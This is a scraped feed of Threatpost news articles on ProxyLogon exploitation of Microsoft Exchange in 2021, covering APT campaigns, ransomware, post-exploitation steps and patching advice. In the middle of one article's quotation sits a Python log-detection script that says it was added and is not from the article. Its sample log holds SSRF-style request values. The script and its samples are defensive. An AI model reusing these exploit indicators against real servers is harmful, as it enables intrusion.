\u201cThis suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.\u201d\n\n> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>\n> \n> \u2014 Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)\n\nThis activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen \u201cscanning and compromising Exchange servers en masse,\u201d according to ESET.\n\n\u201cWe have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,\u201d according to the ESET report.\n\nIt also appears that threat groups are piggybacking on each other\u2019s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.\n\n\u201cWe cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,\u201d said ESET researchers. \u201cOnce the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it. 
We also noticed in some cases that several threat actors were targeting the same organization.\u201d\n\n## **Zero-Day Activity Targeting Microsoft Exchange Bugs**\n\nESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.\n\nFor instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.\n\n\u201cWe then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,\u201d ESET researchers said. \u201cIts main objective seems to be intellectual property and classified information theft.\u201d\n\n\n\nA timeline of ProxyLogon activity. Source: ESET.\n\nOne day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.\n\n\u201cLuckyMouse operators started by dropping the Nbtscan tool in C:\\programdata\\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,\u201d according to ESET\u2019s report. \u201cFinally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.\u201d\n\nThat same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. 
And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.\n\n\u201cAs part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),\u201d according to ESET. \u201cThese tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).\u201d\n\nESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.\n\n\u201cThe attackers started by dropping webshells,\u201d according to ESET. \u201cAt one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)\u2026at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders\u2026used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.\u201d\n\nAfter the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).\n\nAnd, the Mikroceen APT group (a.k.a. 
Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.\n\n## **Unattributed Exploitation Activity**\n\nA cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.\n\nESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.\n\nIt also saw another cluster of activity targeting around 650 servers, mostly in Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.\n\nAnd finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.\n\nThe groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.\n\n\u201cOur ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,\u201d ESET concluded. 
\u201cIt is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.\u201d\n\nOrganizations with on-premises Microsoft Exchange servers should patch as soon as possible, researchers noted \u2013 if it\u2019s not already too late.\n\n\u201cThe best mitigation advice for network defenders is to apply the relevant patches,\u201d said Joe Slowik, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). \u201cHowever, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities \u2014 including attack surface reduction and active threat hunting \u2014 to counter existing intrusions.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n\n** **\n", "cvss3": {}, "published": "2021-03-11T18:01:16", "type": "threatpost", "title": "Microsoft Exchange Servers Face APT Attack Tsunami", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-11T18:01:16", "id": "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "href": 
"https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. 
Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nhttps://twitter.com/demonslay335/status/1370125343571509250\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. 
On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here)](<https://twitter.com/malwrhunterteam/status/1370271414855593986>).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continues to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations has doubled every two to three hours.\n\nResearchers said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. 
\u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. 
The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched the following bugs this 
week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. 
\u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. 
\u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. 
It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,\u201d Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. \u201cIn addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.\u201d\n", "cvss3": {}, "published": "2021-03-03T15:30:52", "type": "threatpost", "title": "Microsoft Exchange 0-Day Attackers Spy on U.S. 
Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T15:30:52", "id": "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "href": "https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n\n\nClick to enlarge. 
Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. 
It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. 
\u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied,\u201d Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. 
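The second step above, investigating for exploitation, is concrete enough to show in code. Microsoft's published detection guidance for CVE-2021-26855 (not quoted on this page) is to look through the Exchange HttpProxy logs, kept under the Exchange install's Logging\HttpProxy directory, for requests where AuthenticatedUser is empty and AnchorMailbox matches the pattern ServerInfo~*/*. The following is an added Python example, not Microsoft's script and not code from the article: the log sample is constructed and carries only a handful of the real columns, the AnchorMailbox values are illustrative rather than captured from an attack, and the handling of a `#Fields:` preamble is a defensive assumption about the log layout rather than something the page states.

```python
"""Triage Exchange HttpProxy logs for CVE-2021-26855 (ProxyLogon SSRF) indicators.

Added example. The column subset is a simplification of the real CSV header and
SAMPLE_LOG is constructed, not a real capture.
"""
import csv
import io
from collections import Counter
from pathlib import Path
from typing import Dict, Iterable, List

# Constructed sample: two unauthenticated requests whose AnchorMailbox names a
# back-end target on port 444 (the SSRF indicator) and two ordinary
# authenticated requests that must not be flagged.
SAMPLE_LOG = """DateTime,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox
2021-03-03T10:15:02.123Z,203.0.113.7,/owa/auth/x.js,,ServerInfo~a]@localhost:444/autodiscover/autodiscover.xml?#
2021-03-03T10:15:04.456Z,203.0.113.7,/ecp/y.js,,ServerInfo~a]@mail.example.test:444/ecp/proxyLogon.ecp?#
2021-03-03T10:16:00.000Z,198.51.100.20,/owa/,EXAMPLE\\alice,alice@example.test
2021-03-03T10:16:30.000Z,198.51.100.21,/ews/exchange.asmx,EXAMPLE\\bob,bob@example.test
"""


def is_serverinfo_anchor(anchor: str) -> bool:
    """Match 'ServerInfo~*/*': the ServerInfo~ prefix followed somewhere by a '/'."""
    prefix = "ServerInfo~"
    return anchor.startswith(prefix) and "/" in anchor[len(prefix):]


def parse_httpproxy_log(text: str) -> List[Dict[str, str]]:
    """Parse one log into dict rows.

    Accepts a plain CSV header, and (assumption, handled defensively) a W3C-style
    preamble where the column names sit on a '#Fields:' line.
    """
    header = None
    body: List[str] = []
    for line in text.splitlines():
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                header = [c.strip() for c in line[len("#Fields:"):].split(",")]
            continue
        body.append(line)
    return list(csv.DictReader(io.StringIO("\n".join(body)), fieldnames=header))


def find_proxylogon_hits(rows: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Rows where nobody authenticated yet a back-end anchor was supplied."""
    hits = []
    for row in rows:
        user = (row.get("AuthenticatedUser") or "").strip()
        anchor = (row.get("AnchorMailbox") or "").strip()
        if user == "" and is_serverinfo_anchor(anchor):
            hits.append(row)
    return hits


def triage_log_text(text: str) -> List[Dict[str, str]]:
    return find_proxylogon_hits(parse_httpproxy_log(text))


def triage_log_dir(log_dir: Path) -> List[Dict[str, str]]:
    """Walk a directory of *.log / *.LOG files and collect hits, tagged by file."""
    hits: List[Dict[str, str]] = []
    for path in sorted(p for p in log_dir.rglob("*") if p.suffix.lower() == ".log"):
        for hit in triage_log_text(path.read_text(encoding="utf-8", errors="replace")):
            hit["_file"] = path.name
            hits.append(hit)
    return hits


def summarize_by_client(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count hits per client address; a handful of sources usually stand out."""
    return dict(Counter(h.get("ClientIpAddress", "?") for h in hits))


if __name__ == "__main__":
    import sys
    found = triage_log_dir(Path(sys.argv[1])) if len(sys.argv) > 1 else triage_log_text(SAMPLE_LOG)
    for h in found:
        print(h.get("DateTime"), h.get("ClientIpAddress"), h.get("UrlStem"), h.get("AnchorMailbox"))
    print("hits per client:", summarize_by_client(found))
```

Run it with the HttpProxy log directory as the single argument on a copy of the logs taken off the server; a hit does not prove a successful exploit, but an unauthenticated request carrying a back-end anchor is the thing to pull web-shell and persistence hunting from.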
\u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. 
potential litigation because sensitive data was stolen from the network.\u201d\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. 
